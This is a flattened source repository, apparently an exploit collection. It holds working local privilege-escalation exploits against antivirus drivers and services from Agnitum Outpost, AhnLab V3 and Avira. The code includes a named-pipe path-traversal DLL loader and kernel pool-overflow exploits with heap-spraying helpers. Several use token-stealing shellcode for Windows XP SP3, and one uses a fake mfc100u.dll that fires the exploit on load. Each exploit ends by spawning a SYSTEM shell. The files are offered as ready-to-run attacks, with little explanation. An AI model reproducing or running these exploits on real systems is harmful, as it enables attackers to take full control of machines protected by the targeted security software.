├── Agnitum ├── SA54477_Outpost_acs.exe │ ├── exploit.cpp │ ├── exploit.exe │ ├── make.bat │ ├── x.cpp │ └── x.dll └── SA54477_sandbox.sys │ ├── poc.cpp │ └── poc.exe ├── Ahnlab ├── SA54465_V3_MedCoreD.sys │ ├── Analysis.docx │ └── Code │ │ ├── PoolBlade.cpp │ │ ├── PoolBlade.h │ │ ├── exploit.cpp │ │ └── exploit.exe └── V3_flt2k.sys │ ├── ATampt.dll │ ├── AhnCtlKd.dll │ ├── exploit.cpp │ └── exploit.exe ├── Avira └── SA55412_Avipbb.sys_filterBypass_pooloverflow │ ├── exploit.exe │ ├── mfc100u.dll │ └── mfc100u │ ├── mfc100u.sln │ ├── mfc100u.suo │ └── mfc100u │ ├── ReadMe.txt │ ├── dllmain.cpp │ ├── mfc100u.cpp │ ├── mfc100u.h │ ├── mfc100u.vcxproj │ ├── mfc100u.vcxproj.filters │ ├── mfc100u.vcxproj.user │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h ├── Microsoft └── MS13_037_ieActiveXploitationMethod │ ├── js.htm │ └── poc.htm └── README.md /Agnitum/SA54477_Outpost_acs.exe/exploit.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #pragma comment(lib, "Advapi32.lib") 4 | 5 | HANDLE GetNamedPipeHandle() 6 | { 7 | SECURITY_DESCRIPTOR sd = {0}; 8 | InitializeSecurityDescriptor(&sd, 1); 9 | SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE); 10 | SECURITY_ATTRIBUTES sa = {0}; 11 | sa.nLength = sizeof(SECURITY_ATTRIBUTES); 12 | sa.lpSecurityDescriptor = &sd; 13 | sa.bInheritHandle = NULL; 14 | 15 | HANDLE h = CreateFile(TEXT("\\\\.\\pipe\\acsipc_server"), 0xC0000000, 3, 16 | &sa, 3, 0x80000080, NULL); 17 | if(h != (HANDLE)-1 ) 18 | return h; 19 | 20 | return NULL; 21 | } 22 | 23 | void RunCommand(HANDLE handle, BYTE command, BYTE * data, DWORD dataLen) 24 | { 25 | DWORD table[] = {0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15}; 26 | 27 | DWORD bufferLen = 0x28+dataLen; 28 | BYTE * buffer = (BYTE*)malloc(bufferLen); 29 | //memset(buffer, 0x50, 0x1000); 30 | *(DWORD*)buffer = table[0]; 31 | *(DWORD*)(buffer+4) = table[1]; 32 | *(DWORD*)(buffer+8) = table[2]; 33 | *(DWORD*)(buffer+0xc) = table[3]; 34 | *(DWORD*)(buffer+0x10) = command; 35 | *(DWORD*)(buffer+0x14) = 0x30303030; 36 | *(DWORD*)(buffer+0x18) = dataLen; 37 | *(DWORD*)(buffer+0x1c) = 0x0; 38 | *(DWORD*)(buffer+0x20) = 0x0; 39 | *(DWORD*)(buffer+0x24) = 0x0; 40 | memcpy(buffer+0x28, data, dataLen); 41 | DWORD dwB; 42 | WriteFile(handle, buffer, bufferLen, &dwB, NULL); 43 | free(buffer); 44 | } 45 | 46 | 47 | void GetDirectory(WCHAR * path) 48 | { 49 | int len = -1; 50 | for(int i = wcslen(path); path[i] != L'\\' ; i-=1) 51 | { 52 | len++; 53 | } 54 | path[wcslen(path) - len] = 0x00; 55 | } 56 | 57 | 58 | int main(int argc, char ** argv) 59 | { 60 | WCHAR current_path[MAX_PATH]; 61 | GetModuleFileNameW(NULL, current_path, MAX_PATH); 62 | GetDirectory(current_path); 63 | wcscat(current_path, L"x.dll"); 64 | GetShortPathNameW(current_path, current_path, MAX_PATH); 65 | 66 | 67 | WCHAR * traversal = (WCHAR*)malloc(MAX_PATH*2); 68 | memset(traversal, 0, MAX_PATH*2); 69 | 70 | for(int j = 0; j < 10; j++) 71 | wcscat(traversal, L"\\.."); 72 | wcscat(traversal, current_path+2); 73 | //wprintf(L"TRYING: %s\n", traversal); 74 | 75 | DWORD dataLen = wcslen(traversal)*2+2+0x14; 76 | BYTE *data = (BYTE*)malloc(dataLen); 77 | memset(data, 0, dataLen); 78 | memcpy(data+0x11, traversal, wcslen(traversal)*2+2); 79 | HANDLE handle = GetNamedPipeHandle(); 80 | if(handle) 81 | { 82 | RunCommand(handle, 0x17, data, dataLen); 83 | } 84 | else 85 | { 86 | printf("Unable to get handler, may be the antivirus service is down!\n"); 87 | } 88 | free(data); 89 | free(traversal); 90 | } -------------------------------------------------------------------------------- /Agnitum/SA54477_Outpost_acs.exe/exploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Agnitum/SA54477_Outpost_acs.exe/exploit.exe -------------------------------------------------------------------------------- /Agnitum/SA54477_Outpost_acs.exe/make.bat: -------------------------------------------------------------------------------- 1 | cl /LD x.cpp 2 | cl exploit.cpp 3 | del *.obj -------------------------------------------------------------------------------- /Agnitum/SA54477_Outpost_acs.exe/x.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | BOOL APIENTRY DllMain( HMODULE hModule, 4 | DWORD ul_reason_for_call, 5 | LPVOID lpReserved ) 6 | { 7 | switch (ul_reason_for_call) 8 | { 9 | case DLL_PROCESS_ATTACH: 10 | { 11 | STARTUPINFO si; 12 | memset(&si,0,sizeof(si)); 13 | si.cb=sizeof(si); 14 | si.lpDesktop = "WinSta0\\Default"; 15 | PROCESS_INFORMATION pi; 16 | CreateProcessA("cmd.exe",0,0,0,FALSE,0,0,0,&si,&pi); 17 | break; 18 | } 19 | default: 20 | break; 21 | } 22 | return TRUE; 23 | } 24 | -------------------------------------------------------------------------------- /Agnitum/SA54477_Outpost_acs.exe/x.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Agnitum/SA54477_Outpost_acs.exe/x.dll -------------------------------------------------------------------------------- /Agnitum/SA54477_sandbox.sys/poc.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #define SIZE 0x600000 3 | typedef struct Argos{ 4 | HANDLE handle; 5 | DWORD code; 6 | BYTE * buffer; 7 | DWORD len; 8 | } ARGOS; 9 | 10 | DWORD WINAPI ioctlreq(VOID * args) 11 | { 12 | BYTE outbuffer[0x200]; 13 | DWORD dwErrCode; 14 | DeviceIoControl(((ARGOS*)args)->handle, ((ARGOS*)args)->code, ((ARGOS*)args)->buffer, ((ARGOS*)args)->len, outbuffer, sizeof(outbuffer), &dwErrCode, 0); 15 | return 0; 16 | } 17 | 18 | int main(int argc, char ** argv) 19 | { 20 | HANDLE handle = INVALID_HANDLE_VALUE; 21 | handle = CreateFileA("\\\\.\\SandBox", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 22 | NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 0); 23 | if (handle == INVALID_HANDLE_VALUE) 24 | return -1; 25 | else 26 | { 27 | 28 | DWORD len = SIZE + 0x1F; 29 | BYTE* inbuffer = (BYTE *) VirtualAlloc(NULL, len, MEM_COMMIT, 0x40); 30 | ZeroMemory(inbuffer, len); 31 | *(DWORD*)(inbuffer) = 0x1024; 32 | *(DWORD*)(inbuffer+0x4) = 0x4d; 33 | *(DWORD*)(inbuffer+0x10) = len; 34 | *(DWORD*)(inbuffer+0x14) = 0x0000BEEB; 35 | *(WORD*)(inbuffer+0x18) = 0x1; 36 | *(BYTE*)(inbuffer+0x1A) = 0x1; 37 | *(DWORD*)(inbuffer+0x1B) = 0x80300000; 38 | for(int i = 0 ; i < SIZE; i++) 39 | { 40 | *(BYTE*)(inbuffer+0x1F+i) = 0x41; 41 | } 42 | ARGOS * args = new ARGOS(); 43 | args->buffer = inbuffer; 44 | args->handle = handle; 45 | args->len = len; 46 | args->code = 0x80000208; 47 | ioctlreq(args); 48 | free(args); 49 | CloseHandle(handle); 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /Agnitum/SA54477_sandbox.sys/poc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Agnitum/SA54477_sandbox.sys/poc.exe -------------------------------------------------------------------------------- /Ahnlab/SA54465_V3_MedCoreD.sys/Analysis.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Ahnlab/SA54465_V3_MedCoreD.sys/Analysis.docx -------------------------------------------------------------------------------- /Ahnlab/SA54465_V3_MedCoreD.sys/Code/PoolBlade.cpp: -------------------------------------------------------------------------------- 1 | #include "PoolBlade.h" 2 | 3 | 4 | PoolBlade::PoolBlade() 5 | { 6 | fake = NULL; 7 | buffer = NULL; 8 | pShellcode = NULL; 9 | hArr = NULL; 10 | dwPoolSize = 0; 11 | } 12 | 13 | PoolBlade::PoolBlade(VOID * shellcode, DWORD size) 14 | { 15 | PoolBlade(); 16 | pShellcode = shellcode; 17 | dwPoolSize = size; 18 | } 19 | 20 | VOID PoolBlade::Fill() 21 | { 22 | for(int i = 0 ; i < 0x100000 ; i++) 23 | CreateEvent(NULL, FALSE, FALSE, NULL); 24 | } 25 | BYTE * PoolBlade::AutoExploitInit(DWORD *size) 26 | { 27 | if(pShellcode == NULL || dwPoolSize == 0) 28 | return NULL; 29 | 30 | Fill(); 31 | 32 | int i; 33 | hArr = new HANDLE[0x10000]; 34 | for(i = 0 ; i < 0x10000 ; i++) 35 | hArr[i] = CreateEvent(NULL, FALSE, FALSE, NULL); 36 | 37 | for(i = 0 ; i < 0xf000 ; i+=0x200) 38 | for(int j = 0; j < (dwPoolSize / 0x30)+1; j++) 39 | CloseHandle(hArr[i+j]); 40 | 41 | *size = dwPoolSize + 0x16; 42 | buffer = new BYTE[*size]; 43 | memset(buffer, 0x41, dwPoolSize); 44 | 45 | 46 | *(WORD*)(buffer+dwPoolSize) = ((dwPoolSize+8)/8) & 0x1ff; 47 | buffer[dwPoolSize+2] = 0x06; 48 | buffer[dwPoolSize+3] = 0x0A; 49 | *(DWORD*)(buffer+dwPoolSize+4) = 0xee657645; 50 | *(DWORD*)(buffer+dwPoolSize+8) = 0xdeadfa11; 51 | *(DWORD*)(buffer+dwPoolSize+0xC) = 0xcafebabe; 52 | 53 | fake = new BYTE[0x190]; 54 | memset(fake, 0, 0x190); 55 | *(DWORD*)(fake+0xA8) = (DWORD)pShellcode; 56 | 57 | *(DWORD*)(buffer+dwPoolSize+0x10) = (DWORD)fake; 58 | *(WORD*)(buffer+dwPoolSize+0x14) = NULL; 59 | return buffer; 60 | } 61 | 62 | VOID PoolBlade::ExploitFinish() 63 | { 64 | 65 | for(int i = 0 ; i < 0x10000 ; i++) 66 | CloseHandle(hArr[i]); 67 | 68 | if (fake != NULL) 69 | delete fake; 70 | if ( buffer != NULL) 71 | delete buffer; 72 | if(hArr != NULL) 73 | delete hArr; 74 | } 75 | -------------------------------------------------------------------------------- /Ahnlab/SA54465_V3_MedCoreD.sys/Code/PoolBlade.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | class PoolBlade 4 | { 5 | private: 6 | VOID * pShellcode; 7 | DWORD dwPoolSize; 8 | HANDLE * hArr; 9 | BYTE * fake; 10 | BYTE * buffer; 11 | VOID Fill(); 12 | 13 | public: 14 | PoolBlade(VOID *, DWORD); 15 | PoolBlade(); 16 | BYTE * AutoExploitInit(DWORD*); 17 | VOID ExploitFinish(); 18 | }; -------------------------------------------------------------------------------- /Ahnlab/SA54465_V3_MedCoreD.sys/Code/exploit.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include 4 | #include "PoolBlade.h" 5 | 6 | 7 | //Offsets of Data structures WINXPSP3 8 | #define _KPROCESS 0x44 9 | #define _TOKEN 0xc8 10 | #define _UPID 0x84 11 | #define _APLINKS 0x88 12 | 13 | VOID shellcode() 14 | { 15 | __asm 16 | { 17 | push edx 18 | push ebx 19 | xor eax, eax 20 | mov eax, fs:[eax+124h] 21 | mov eax, [eax+_KPROCESS] 22 | mov ecx, eax 23 | mov ebx, [eax+_TOKEN] 24 | L: mov eax, [eax+_APLINKS] 25 | sub eax,88h 26 | cmp [eax+_UPID], 4 27 | jnz L 28 | mov edx,[eax+_TOKEN] 29 | mov eax, ecx 30 | mov [eax+_TOKEN],edx 31 | pop ebx 32 | pop edx 33 | } 34 | } 35 | 36 | int main() 37 | { 38 | HANDLE handle = INVALID_HANDLE_VALUE; 39 | handle = CreateFileA("\\\\.\\MeDCoreD_V3IS80", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 40 | NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 0); 41 | if (handle == INVALID_HANDLE_VALUE) 42 | return -1; 43 | else 44 | { 45 | PoolBlade * pb = new PoolBlade(shellcode, 0x7d0); 46 | 47 | DWORD inSize = 0; 48 | BYTE * inbuffer = pb->AutoExploitInit(&inSize); 49 | 50 | char outbuffer[0x100]; 51 | 52 | DWORD dwSz; 53 | DeviceIoControl(handle, 0xA3350014, inbuffer, inSize, outbuffer, sizeof(outbuffer), &dwSz, NULL); 54 | pb->ExploitFinish(); 55 | CloseHandle(handle); 56 | } 57 | printf("Enjoy your system shell ;)\n\n"); 58 | WinExec("CMD", SW_SHOWNORMAL); 59 | } -------------------------------------------------------------------------------- /Ahnlab/SA54465_V3_MedCoreD.sys/Code/exploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Ahnlab/SA54465_V3_MedCoreD.sys/Code/exploit.exe -------------------------------------------------------------------------------- /Ahnlab/V3_flt2k.sys/ATampt.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Ahnlab/V3_flt2k.sys/ATampt.dll -------------------------------------------------------------------------------- /Ahnlab/V3_flt2k.sys/AhnCtlKd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Ahnlab/V3_flt2k.sys/AhnCtlKd.dll -------------------------------------------------------------------------------- /Ahnlab/V3_flt2k.sys/exploit.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define OVERFLOW_SIZE 0x816 5 | #define IOCTLCODE 0xA337085C 6 | 7 | typedef struct ARGUMENTS 8 | { 9 | HANDLE handle; //+0 10 | BYTE * buffer; //+4 11 | DWORD unused0; //+8 12 | DWORD unused1; //+C 13 | DWORD unused3; //+10 14 | DWORD unused4; //+10 15 | BYTE * buffer2; //+14 16 | }ARGS; 17 | 18 | typedef DWORD (*TypeAuthorize)(ARGS * a1); 19 | typedef DWORD (WINAPI *TypeSecureIoControl)(ARGS * a1, BOOL someFlag, DWORD dwIoControlCode, BYTE * realInput, 20 | size_t Size, LPVOID lpOutBuffer, DWORD nOutBufferSize, LPDWORD lpBytesReturned, LPOVERLAPPED lpOverlapped); 21 | 22 | 23 | HMODULE GetLibraryA(CHAR * libName) 24 | { 25 | HMODULE hmd = NULL; 26 | hmd = GetModuleHandleA(libName); 27 | if(hmd == NULL) 28 | { 29 | hmd = LoadLibraryA(libName); 30 | } 31 | return hmd; 32 | } 33 | 34 | DWORD BypassSecurityFilter(ARGS * args) 35 | { 36 | HMODULE hmd = GetLibraryA("ATampt.dll"); 37 | if(hmd == NULL) 38 | return GetLastError(); 39 | TypeAuthorize Authorize = (TypeAuthorize)((DWORD)hmd+0x68A6); 40 | return Authorize(args); 41 | } 42 | 43 | DWORD IoControl(ARGS * args, DWORD dwIoControlCode, BYTE *realInput, 44 | size_t Size, LPVOID lpOutBuffer, DWORD nOutBufferSize) 45 | { 46 | HMODULE hmd = GetLibraryA("ATampt.dll"); 47 | if(hmd == NULL) 48 | return GetLastError(); 49 | TypeSecureIoControl SecureIoControl = (TypeSecureIoControl)((DWORD)hmd+0x6BC9); 50 | DWORD BytesReturned = 0; 51 | return SecureIoControl(args, TRUE, dwIoControlCode, realInput, Size, lpOutBuffer, nOutBufferSize, 52 | &BytesReturned, NULL); 53 | } 54 | 55 | 56 | //Offsets of Data structures WINXPSP3 57 | #define _KPROCESS 0x44 58 | #define _TOKEN 0xc8 59 | #define _UPID 0x84 60 | #define _APLINKS 0x88 61 | 62 | VOID SHELLCODE() 63 | { 64 | __asm 65 | { 66 | push edx 67 | push ebx 68 | xor eax, eax 69 | mov eax, fs:[eax+124h] 70 | mov eax, [eax+_KPROCESS] 71 | mov ecx, eax 72 | mov ebx, [eax+_TOKEN] 73 | L: mov eax, [eax+_APLINKS] 74 | sub eax,88h 75 | cmp [eax+_UPID], 4 76 | jnz L 77 | mov edx,[eax+_TOKEN] 78 | mov eax, ecx 79 | mov [eax+_TOKEN],edx 80 | pop ebx 81 | pop edx 82 | } 83 | } 84 | 85 | int main() 86 | { 87 | 88 | int i; 89 | for(i = 0 ; i < 0x100000 ; i++) 90 | CreateEvent(NULL, FALSE, FALSE, NULL); 91 | 92 | HANDLE hArr[0x10000]; 93 | for(i = 0 ; i < 0x10000 ; i++) 94 | hArr[i] = CreateEvent(NULL, FALSE, FALSE, NULL); 95 | 96 | for(i = 0 ; i < 0xf000 ; i+=0x200) 97 | for(int j = 0; j < 0x2b; j++) 98 | CloseHandle(hArr[i+j]); 99 | 100 | HANDLE handle = INVALID_HANDLE_VALUE; 101 | handle = CreateFileA("\\\\.\\V3Flt2k", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 102 | NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 0); 103 | if (handle == INVALID_HANDLE_VALUE) 104 | return -1; 105 | else 106 | { 107 | ARGS * args = new ARGS(); 108 | args->handle = handle; 109 | args->buffer = new BYTE[0x10]; 110 | ZeroMemory(args->buffer, 0x10); 111 | args->buffer2 = new BYTE[0x10]; 112 | ZeroMemory(args->buffer2, 0x10); 113 | 114 | if(!BypassSecurityFilter(args)) 115 | { 116 | BYTE fake[0x190]; 117 | memset(fake, 0, 0x190); 118 | *(DWORD*)(fake+0xA8) = (DWORD)SHELLCODE; 119 | BYTE input[OVERFLOW_SIZE]; 120 | memset(input, 0x45, OVERFLOW_SIZE); 121 | input[0x800] = 0x01; 122 | input[0x801] = 0x01; 123 | input[0x802] = 0x06; 124 | input[0x803] = 0x0A; 125 | *(DWORD*)(input+0x804) = 0xee657645; 126 | *(DWORD*)(input+0x808) = 0xdeadfa11; 127 | *(DWORD*)(input+0x80C) = 0xcafebabe; 128 | *(DWORD*)(input+0x810) = (DWORD)&fake; 129 | *(WORD*)(input+OVERFLOW_SIZE-2) = NULL; 130 | char output[0x40]; 131 | DWORD status = IoControl(args, IOCTLCODE, input, sizeof(input), output, sizeof(output)); 132 | } 133 | 134 | for(i = 0 ; i < 0x10000 ; i++) 135 | { 136 | CloseHandle(hArr[i]); 137 | } 138 | CloseHandle(handle); 139 | } 140 | printf("Enjoy your system shell ;)\n\n"); 141 | WinExec("CMD", SW_SHOWNORMAL); 142 | } 143 | -------------------------------------------------------------------------------- /Ahnlab/V3_flt2k.sys/exploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Ahnlab/V3_flt2k.sys/exploit.exe -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/exploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/exploit.exe -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u.dll -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual Studio 2010 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mfc100u", "mfc100u\mfc100u.vcxproj", "{209D88FA-0091-49F4-A9B8-FF7413D6F399}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {209D88FA-0091-49F4-A9B8-FF7413D6F399}.Debug|Win32.ActiveCfg = Debug|Win32 13 | {209D88FA-0091-49F4-A9B8-FF7413D6F399}.Debug|Win32.Build.0 = Debug|Win32 14 | {209D88FA-0091-49F4-A9B8-FF7413D6F399}.Release|Win32.ActiveCfg = Release|Win32 15 | {209D88FA-0091-49F4-A9B8-FF7413D6F399}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suto/Exploit/53f84a050e0c8d4c82d9af6fc5354ab006e96ca9/Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u.suo -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : mfc100u Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this mfc100u DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your mfc100u application. 9 | 10 | 11 | mfc100u.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | mfc100u.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | mfc100u.cpp 25 | This is the main DLL source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named mfc100u.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "stdafx.h" 3 | 4 | 5 | //Offsets of Data structures WINXPSP3 6 | #define _KPROCESS 0x44 7 | #define _TOKEN 0xc8 8 | #define _UPID 0x84 9 | #define _APLINKS 0x88 10 | 11 | VOID shellcode() 12 | { 13 | __asm 14 | { 15 | push edx 16 | push ebx 17 | xor eax, eax 18 | mov eax, fs:[eax+124h] 19 | mov eax, [eax+_KPROCESS] 20 | mov ecx, eax 21 | mov ebx, [eax+_TOKEN] 22 | L: mov eax, [eax+_APLINKS] 23 | sub eax,88h 24 | cmp [eax+_UPID], 4 25 | jnz L 26 | mov edx,[eax+_TOKEN] 27 | mov eax, ecx 28 | mov [eax+_TOKEN],edx 29 | pop ebx 30 | pop edx 31 | } 32 | } 33 | 34 | 35 | DWORD Driver() 36 | { 37 | HANDLE handle = INVALID_HANDLE_VALUE; 38 | handle = CreateFileA("\\\\.\\avipbb", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 39 | NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 0); 40 | if (handle == INVALID_HANDLE_VALUE) 41 | return -1; 42 | else 43 | { 44 | char inbuffer[0x8] = {0xE0, 0xAB, 0xEB, 0xAC, 0xAF, 0xAB, 0xEB, 0x1F}; 45 | DWORD dwSz; 46 | DeviceIoControl(handle, 0x222458, inbuffer, sizeof(inbuffer), NULL, NULL, &dwSz, NULL); 47 | 48 | 49 | void * memoo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x300); 50 | memset(memoo, 0x41, 0x300); 51 | *(DWORD*)((DWORD)memoo) = 0x118; 52 | *(DWORD*)((DWORD)memoo+0x4) = (DWORD)memoo; 53 | *(DWORD*)((DWORD)memoo+0x1f4) = (DWORD)memoo; 54 | *(DWORD*)((DWORD)memoo+0x104) = 0x0a060024; 55 | *(DWORD*)((DWORD)memoo+0x108) = 0xee657645; 56 | *(DWORD*)((DWORD)memoo+0x10c) = 0xdeadfa11; 57 | *(DWORD*)((DWORD)memoo+0x110) = 0xcafebabe; 58 | BYTE * fake = new BYTE[0x190]; 59 | memset(fake, 0, 0x190); 60 | *(DWORD*)(fake+0xA8) = (DWORD)shellcode; 61 | *(DWORD*)((DWORD)memoo+0x114) = (DWORD)fake; 62 | 63 | 64 | char inbuffer2[0x118]; 65 | memset(inbuffer2, 0x45, 0x118); 66 | *(DWORD*)(inbuffer2+8) = (DWORD)memoo; 67 | 68 | char output[0x18]; 69 | memset(output, 0x42, 0x18); 70 | 71 | HANDLE * hArr = new HANDLE[0x10000]; 72 | int i = 0; 73 | 74 | for(i = 0 ; i < 0x100000 ; i++) 75 | CreateEvent(NULL, FALSE, FALSE, NULL); 76 | 77 | for(i = 0 ; i < 0x10000 ; i++) 78 | hArr[i] = CreateEvent(NULL, FALSE, FALSE, NULL); 79 | 80 | for(i = 0 ; i < 0xf000 ; i+=0x200) 81 | for(int j = 0; j < 6; j++) 82 | CloseHandle(hArr[i+j]); 83 | 84 | DeviceIoControl(handle, 0x222450, inbuffer2, sizeof(inbuffer2), output, sizeof(output), &dwSz, NULL); 85 | 86 | for(int i = 0 ; i < 0x10000 ; i++) 87 | CloseHandle(hArr[i]); 88 | delete hArr; 89 | CloseHandle(handle); 90 | WinExec("CMD", SW_SHOWNORMAL); 91 | } 92 | return 0; 93 | } 94 | 95 | BOOL APIENTRY DllMain( HMODULE hModule, 96 | DWORD ul_reason_for_call, 97 | LPVOID lpReserved 98 | ) 99 | { 100 | switch (ul_reason_for_call) 101 | { 102 | case DLL_PROCESS_ATTACH: 103 | { 104 | ExitProcess(Driver()); 105 | break; 106 | } 107 | default: 108 | break; 109 | } 110 | return TRUE; 111 | } 112 | 113 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/mfc100u.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {209D88FA-0091-49F4-A9B8-FF7413D6F399} 15 | Win32Proj 16 | mfc100u 17 | 18 | 19 | 20 | DynamicLibrary 21 | true 22 | Unicode 23 | 24 | 25 | DynamicLibrary 26 | false 27 | true 28 | Unicode 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | true 42 | 43 | 44 | false 45 | 46 | 47 | 48 | Use 49 | Level3 50 | Disabled 51 | WIN32;_DEBUG;_WINDOWS;_USRDLL;MFC100U_EXPORTS;%(PreprocessorDefinitions) 52 | 53 | 54 | Windows 55 | true 56 | 57 | 58 | 59 | 60 | Level3 61 | Use 62 | MaxSpeed 63 | true 64 | true 65 | WIN32;NDEBUG;_WINDOWS;_USRDLL;MFC100U_EXPORTS;%(PreprocessorDefinitions) 66 | 67 | 68 | Windows 69 | true 70 | true 71 | true 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | false 85 | 86 | 87 | false 88 | 89 | 90 | 91 | 92 | 93 | Create 94 | Create 95 | 96 | 97 | 98 | 99 | 100 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/mfc100u.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | -------------------------------------------------------------------------------- /Avira/SA55412_Avipbb.sys_filterBypass_pooloverflow/mfc100u/mfc100u/mfc100u.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- 